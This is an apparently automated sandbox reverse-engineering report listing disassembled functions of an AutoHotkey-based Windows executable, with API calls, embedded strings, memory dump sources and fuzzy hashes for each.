Function 00457040, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 277windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000040B,00000000,00000000), ref: 0045716F
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 004571CC
SendMessageW.USER32(?), ref: 004571FA
SendMessageW.USER32(?,00000414,00000001,00000000), ref: 00457213
DestroyIcon.USER32(00000000), ref: 0045721A
SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00457237

Strings

$%K, xrefs: 00457099

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: MessageSend$DestroyIcon
String ID: $%K
API String ID: 3419509030-3388506065
Opcode ID: 0ac99bd40cabc6a43c4ad9bf54ff327c1e6cbc6bd7fa956c438a7c883104b2e7
Instruction ID: d2fd1e80d010dc81eeeb558c0609c20658b2cff156483a6b137ce6e9d6341820
Opcode Fuzzy Hash: 0ac99bd40cabc6a43c4ad9bf54ff327c1e6cbc6bd7fa956c438a7c883104b2e7
Instruction Fuzzy Hash: 5C91B0716083019BD710CF69E881B2BB7E5EB84316F14457EFD089B382D735E809CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0045C180, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 133windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 0045C18C
SendMessageTimeoutW.USER32 ref: 0045C1CE
GetParent.USER32 ref: 0045C1E4
SetLastError.KERNEL32(00000000,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045C1F6
GetDlgCtrlID.USER32 ref: 0045C1FD
GetLastError.KERNEL32(?,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045C209
SendMessageTimeoutW.USER32 ref: 0045C236
SendMessageTimeoutW.USER32 ref: 0045C25E
GetWindowLongW.USER32(?,000000F0), ref: 0045C284
SendMessageTimeoutW.USER32 ref: 0045C2C9
SendMessageTimeoutW.USER32 ref: 0045C2ED

Strings

Combo, xrefs: 0045C196
List, xrefs: 0045C26D

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: MessageSendTimeout$ErrorLast$ClassCtrlLongNameParentWindow
String ID: Combo$List
API String ID: 3027087493-1246219895
Opcode ID: abd31f3a8f3dea3884bbc10c4f49e185211bbb5bb076f21177398617e90c0d4f
Instruction ID: 5bed09a386de09406f4422f5553b9e97ff06709e18ef87600cf6b1c926618e0c
Opcode Fuzzy Hash: abd31f3a8f3dea3884bbc10c4f49e185211bbb5bb076f21177398617e90c0d4f
Instruction Fuzzy Hash: 2C41FA317443057DEA5087209CC5F7F36ACDB85B11F40432BBE60E51D2DB9CDD098AAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C220, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 319COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0040C283
_wcschr.LIBCMT ref: 0040C316
CharLowerW.USER32(?,745EE710,00000000,?), ref: 0040C38A
CharLowerW.USER32 ref: 0040C394
IsCharAlphaNumericW.USER32(?,745EE710,00000000,?), ref: 0040C3CF
GetStringTypeExW.KERNEL32(00000400,00000004,?,00000001,?), ref: 0040C3EC
IsCharLowerW.USER32(?), ref: 0040C4D7
IsCharUpperW.USER32 ref: 0040C4E5
IsCharUpperW.USER32 ref: 0040C4FB

Strings

XdM, xrefs: 0040C3BF
-()[]{}:;'"/\,.?! , xrefs: 0040C311

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Char$Lower$Upper$AlphaNumericStringType_memmove_wcschr
String ID: -()[]{}:;'"/\,.?! $XdM
API String ID: 1628729082-3905447404
Opcode ID: 8f5a20507d4e1466aed0e4bcd57e148124c3cafc8328a70531f18a9caf9a65e7
Instruction ID: bbd23eb9aa5edb858c6948b9642d90b54dc37e8b6a99afb41f0bb69f85e0acc0
Opcode Fuzzy Hash: 8f5a20507d4e1466aed0e4bcd57e148124c3cafc8328a70531f18a9caf9a65e7
Instruction Fuzzy Hash: 4FC12475508260DACB24CF28D9D427B7BE2AB85304F4A463FE885A7391E63CE848C75D

Uniqueness

Uniqueness Score: -1.00%

Function 0041E000, Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 00482B80: GetForegroundWindow.USER32(?,?,?,0040EC6F,004D6340,004AE8F8,00000000,00000000,00000000,00000000), ref: 00482BC1
Part of subcall function 00482B80: IsWindowVisible.USER32(00000000), ref: 00482BD6

GetClassNameW.USER32 ref: 0041E057
__wcsnicmp.LIBCMT ref: 0041E0A1
_wcsrchr.LIBCMT ref: 0041E111
__wcsicoll.LIBCMT ref: 0041E123

Strings

"%s", xrefs: 0041E0C9
open, xrefs: 0041E140
AutoHotkey, xrefs: 0041E09B
edit, xrefs: 0041E0F6
notepad.exe, xrefs: 0041E167
.ini, xrefs: 0041E11D
Could not open script., xrefs: 0041E184
#32770, xrefs: 0041E05D

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Window$ClassForegroundNameVisible__wcsicoll__wcsnicmp_wcsrchr
String ID: "%s"$#32770$.ini$AutoHotkey$Could not open script.$edit$notepad.exe$open
API String ID: 2434504450-1958138439
Opcode ID: d117cd5d2d83b3cdba773995e79a92886cd2c5fd219326a1fa9fc8ef53ddeda9
Instruction ID: 4edc151c2b9b865657b1c3c133587510d55bc16dee55f4d68fc42ccacedbd992
Opcode Fuzzy Hash: d117cd5d2d83b3cdba773995e79a92886cd2c5fd219326a1fa9fc8ef53ddeda9
Instruction Fuzzy Hash: 1A41267134020067E710AB2ACC42FE77699AB99714F48457AFD48DB385E7ADDC81836A

Uniqueness

Uniqueness Score: -1.00%

Function 0045B0B0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(advapi32,?,00000000), ref: 0045B0C4
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 0045B0F9
FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0045B108
_memset.LIBCMT ref: 0045B13A
CloseHandle.KERNEL32(?), ref: 0045B1E0
GetLastError.KERNEL32 ref: 0045B202
FreeLibrary.KERNEL32(00000000), ref: 0045B20F

Strings

RunAs: Missing advapi32.dll., xrefs: 0045B0DD
CreateProcessWithLogonW, xrefs: 0045B0F3
D, xrefs: 0045B147
CreateProcessWithLogonW., xrefs: 0045B11B
advapi32, xrefs: 0045B0BB

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Library$Free$AddressCloseErrorHandleLastLoadProc_memset
String ID: CreateProcessWithLogonW$CreateProcessWithLogonW.$D$RunAs: Missing advapi32.dll.$advapi32
API String ID: 3715048715-4276146922
Opcode ID: 2fba296c5db7fa95bc879cce43244454fad060589f44d73495cb156c120780ef
Instruction ID: 1b714ff07fcc1df8b8343e0bf7b96c99f13913fd9e5f246fc39838007746ad15
Opcode Fuzzy Hash: 2fba296c5db7fa95bc879cce43244454fad060589f44d73495cb156c120780ef
Instruction Fuzzy Hash: 3E416E317407019BE7209F298C95B6B77E4EF85791F14442AFD50DB392EB78E8048BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00425330, Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 91COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0042544F

Strings

+, xrefs: 00425363
!, xrefs: 00425373
&, xrefs: 0042537B
(, xrefs: 0042534B
^, xrefs: 00425383
*, xrefs: 0042536B
{, xrefs: 00425393
., xrefs: 0042538B
<, xrefs: 00425353
:, xrefs: 0042535B
This line does not contain a recognized action., xrefs: 0042542F

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _wcsncpy
String ID: !$&$($*$+$.$:$<$This line does not contain a recognized action.$^${
API String ID: 1735881322-2159613654
Opcode ID: 522b81f2e018de00b9b1ff66c14d8a16125f4dde9505f672707d63dfce5766d1
Instruction ID: 83d33dd6336d9c51efd99531c2443cbab06d09077157f3e92f610ae76e0cba9f
Opcode Fuzzy Hash: 522b81f2e018de00b9b1ff66c14d8a16125f4dde9505f672707d63dfce5766d1
Instruction Fuzzy Hash: 8331F236A047218AC324AF19A4443BFF7A0FFD4344F94981BE89987341E7B88999C796

Uniqueness

Uniqueness Score: -1.00%

Function 0047B140, Relevance: 19.8, APIs: 13, Instructions: 292registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,00000000,004AE8F8,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?), ref: 0047B190
RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?,?,?,?,?,?), ref: 0047B1E3
_malloc.LIBCMT ref: 0047B238
RegSetValueExW.ADVAPI32(?,?,00000000,00000007,00000000,00000000,?,?,?,?,?), ref: 0047B2B1
_free.LIBCMT ref: 0047B2BA
RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 0047B2F9
_malloc.LIBCMT ref: 0047B33F
RegCloseKey.ADVAPI32(?,?,?,?,?,?), ref: 0047B42B
GetLastError.KERNEL32(?,?,?,?,?), ref: 0047B436

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Value$_malloc$CloseCreateErrorLast_free
String ID:
API String ID: 1054883360-0
Opcode ID: aca68506bbf3ea606d3ac3f85040fc4346e13282197e5c58087ffe04071ea2e0
Instruction ID: 25ec39be1e3b38e0c0412aadd5fb483ea4ebceebd7b31da02813565e065c0e0a
Opcode Fuzzy Hash: aca68506bbf3ea606d3ac3f85040fc4346e13282197e5c58087ffe04071ea2e0
Instruction Fuzzy Hash: 779127312043019BD7208B64DC85BEB73A4EF89724F14C62BFD09DB391E778E9458799

Uniqueness

Uniqueness Score: -1.00%

Function 00466170, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

Icon, xrefs: 004663B3

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcstoui64
String ID: Icon
API String ID: 3882282163-3316025061
Opcode ID: fc52763e3b489ff53d5cf53f3dfbad6ac03bd958a8d931243c1fa358ac19c25e
Instruction ID: 7e24d739cbcaccaf7c2713544d4ba3c9582354509edbdd974a64c0cee3227802
Opcode Fuzzy Hash: fc52763e3b489ff53d5cf53f3dfbad6ac03bd958a8d931243c1fa358ac19c25e
Instruction Fuzzy Hash: 0DC11471604300ABC320EF25DC80BAB77E4EB99714F05492FF9449B391EA79E945CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00475220, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 147windowCOMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 004752DA
SetMenuItemInfoW.USER32 ref: 004753DD

Strings

Radio, xrefs: 004752D1
Right, xrefs: 00475304
Break, xrefs: 0047532E
0, xrefs: 004753C9
, xrefs: 00475368
BarBreak, xrefs: 00475352

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: InfoItemMenu__wcsicoll
String ID: $0$BarBreak$Break$Radio$Right
API String ID: 4222793379-1315102453
Opcode ID: ca57af6b000cbc9bf24ec45d13a22be7d51abf117b1eefb9e8e68a3104a5427d
Instruction ID: a9402732caa82acce29303bdf17a8ebc3c565333ec1cb7ddffcba6cc92388984
Opcode Fuzzy Hash: ca57af6b000cbc9bf24ec45d13a22be7d51abf117b1eefb9e8e68a3104a5427d
Instruction Fuzzy Hash: C3413571504B018AC7209F00D8406BBB3A0EF91785F18845FECC99F2A1E7FC9E46C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0045C0C9, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00413C70: __fassign.LIBCMT ref: 00413C80

GetClassNameW.USER32 ref: 0045C0F3
GetWindowLongW.USER32(?,000000F0), ref: 0045C145
SendMessageTimeoutW.USER32 ref: 0045C1CE
GetParent.USER32 ref: 0045C1E4
SetLastError.KERNEL32(00000000,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045C1F6
GetDlgCtrlID.USER32 ref: 0045C1FD
GetLastError.KERNEL32(?,?,?,-00000186,-00000001,00000000,00000002,000007D0,?), ref: 0045C209
SendMessageTimeoutW.USER32 ref: 0045C236
SendMessageTimeoutW.USER32 ref: 0045C25E

Strings

Combo, xrefs: 0045C0FD
List, xrefs: 0045C12E

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: MessageSendTimeout$ErrorLast$ClassCtrlLongNameParentWindow__fassign
String ID: Combo$List
API String ID: 2104288607-1246219895
Opcode ID: e0b37ee626745db53cc1559bd37f978ce52a64cae84c630211bd812454a1826d
Instruction ID: 84ee0c9b01fd439eead61e9387e285d14aab3795ed70e5458593ede1e10fcd10
Opcode Fuzzy Hash: e0b37ee626745db53cc1559bd37f978ce52a64cae84c630211bd812454a1826d
Instruction Fuzzy Hash: 373109317443056EEB609B209CC6F7F76ACDB45B11F00562BBE40E51D2DBACDC098BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0046E140, Relevance: 18.2, APIs: 12, Instructions: 217windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001304,00000000,00000000), ref: 0046E17E
GetWindowLongW.USER32 ref: 0046E1AD
_wcschr.LIBCMT ref: 0046E1F1
SendMessageW.USER32(?,?,00000000,?), ref: 0046E23C
SendMessageW.USER32(?,00001061,?,?), ref: 0046E277
SendMessageW.USER32(?,?,00000000,00000000), ref: 0046E2D9
SendMessageW.USER32(?,0000108F,00000000,00000000), ref: 0046E312
GetWindowLongW.USER32(?,000000F0), ref: 0046E319
SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 0046E33E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0046E360
SendMessageW.USER32(?,0000014E,00000001,?), ref: 0046E37E
SendMessageW.USER32(0000014E,0000014E,?,00000000), ref: 0046E390

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: MessageSend$LongWindow$_wcschr
String ID:
API String ID: 958538355-0
Opcode ID: 2be784552d928b1dc23e98691997658806cef8df32200325e4fcd485f7dfec6c
Instruction ID: d6cd40d99733d303c3b178883645cdf8cf7e471ac89273b099eb378966c39230
Opcode Fuzzy Hash: 2be784552d928b1dc23e98691997658806cef8df32200325e4fcd485f7dfec6c
Instruction Fuzzy Hash: 1B71CE74204340ABD320CF65CC91B77B7EAEB85710F244A5EF991872C1E779E985CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0043025E, Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 299windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32(00000000), ref: 0042FE16
CloseClipboard.USER32(?,?,?,?,00000000), ref: 0042FE22
GetTickCount.KERNEL32 ref: 0042FE3A
PeekMessageW.USER32 ref: 0042FE62
GetTickCount.KERNEL32 ref: 0042FE78
__wcsicoll.LIBCMT ref: 00430295
__wcsicoll.LIBCMT ref: 004302CC

Strings

v-j, xrefs: 0042FE50
A Goto/Gosub must not jump into a block that doesn't enclose it., xrefs: 00430322

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: CountTick__wcsicoll$ClipboardCloseGlobalMessagePeekUnlock
String ID: A Goto/Gosub must not jump into a block that doesn't enclose it.$v-j
API String ID: 3567954741-336211753
Opcode ID: 22870ed7020c7f17a45ad602d1564c069e3903df98bc6275ac07d06af419e2a2
Instruction ID: fbe52dc2e6608efbb5e3b9e7638547b44724c155df044746791d7962058a8132
Opcode Fuzzy Hash: 22870ed7020c7f17a45ad602d1564c069e3903df98bc6275ac07d06af419e2a2
Instruction Fuzzy Hash: F2B1F3316043419FDB24CF25E890B6B73B1AB89314FA4867FE859873A2D738EC45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00472190, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110windowlibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(uxtheme,?,?,?,?,?,0046DD6A,?,?,?,0000041D,00000000,00000000,?,0000000B,00000000), ref: 004721BF
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 004721D1
FreeLibrary.KERNEL32(00000000,?,0000041D,00000000,00000000,?,0000000B,00000000,00000000,?,00000192,?,?), ref: 004721E9
SendMessageW.USER32(?,00000406,?,?), ref: 00472241
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0047225A
SendMessageW.USER32(?,00002001,00000000,?), ref: 00472277
GetSysColor.USER32(0000000F), ref: 00472291
SendMessageW.USER32(?,00002001,00000000,?), ref: 004722A7

Strings

SetWindowTheme, xrefs: 004721CB
uxtheme, xrefs: 004721BA

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: MessageSend$Library$AddressColorFreeLoadProc
String ID: SetWindowTheme$uxtheme
API String ID: 2745204275-1369271589
Opcode ID: f82f8db4aa733ce8a62322046fda81ddd92a36006bc9b8ffb12d5ab6230b5b45
Instruction ID: 67a7a3ba7a136f4beb63a52bbedacb431224f737df96e4f4f6afc48c64bf17c3
Opcode Fuzzy Hash: f82f8db4aa733ce8a62322046fda81ddd92a36006bc9b8ffb12d5ab6230b5b45
Instruction Fuzzy Hash: 0C31E4303007016BE22496658DC4BA7B358EF05721F60865FFA9A966D2D7E8EC81CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00418250, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 87keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32(000000A0), ref: 00418279
GetAsyncKeyState.USER32(000000A1), ref: 0041828F
GetAsyncKeyState.USER32(000000A2), ref: 004182A5
GetAsyncKeyState.USER32(000000A3), ref: 004182BB
GetAsyncKeyState.USER32(000000A4), ref: 004182D1
GetAsyncKeyState.USER32(000000A5), ref: 004182E7
GetAsyncKeyState.USER32(0000005B), ref: 004182FA
GetAsyncKeyState.USER32(0000005C), ref: 0041830D

Strings

wM, xrefs: 00418357
@, xrefs: 00418306

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AsyncState
String ID: wM$@
API String ID: 425341421-243138201
Opcode ID: 72612c42c625df2ace8429c65236592765b74b3a752eab889d8cc5db8604e8d0
Instruction ID: f4cb0873148cc63e3e15e37947e83cf53d0c117229e415dca99d8412e14089aa
Opcode Fuzzy Hash: 72612c42c625df2ace8429c65236592765b74b3a752eab889d8cc5db8604e8d0
Instruction Fuzzy Hash: F331C43021D7C555F7129328C8147EB6FD05B46760F1CC0AFAAD0072D2AEB88888DB6B

Uniqueness

Uniqueness Score: -1.00%

Function 0041B030, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 58COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0041B064

Strings

MonitorPrimary, xrefs: 0041B076
MonitorCount, xrefs: 0041B05E
MonitorName, xrefs: 0041B0BE
Monitor, xrefs: 0041B08E
MonitorWorkArea, xrefs: 0041B0A6

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Monitor$MonitorCount$MonitorName$MonitorPrimary$MonitorWorkArea
API String ID: 3832890014-629551668
Opcode ID: 0e16e87c04fa6223b60b9b2d5dd6df554d5dd58357574acc131b3c2a465946df
Instruction ID: cdd35228d8794413a97819102f82302e03ebc0cf50cdfcfa62671b526b97e34c
Opcode Fuzzy Hash: 0e16e87c04fa6223b60b9b2d5dd6df554d5dd58357574acc131b3c2a465946df
Instruction Fuzzy Hash: FE018665B4061122EE21213D8C03BDB38448BD6B0AFD4857AF918D53C2FBCEC95481EE

Uniqueness

Uniqueness Score: -1.00%

Function 0043E230, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 301COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 0043E2AB
_wcschr.LIBCMT ref: 0043E2D6
GetKeyboardLayout.USER32(00000000), ref: 0043E32A
IsCharAlphaW.USER32(00000000), ref: 0043E413
_free.LIBCMT ref: 0043E4FD
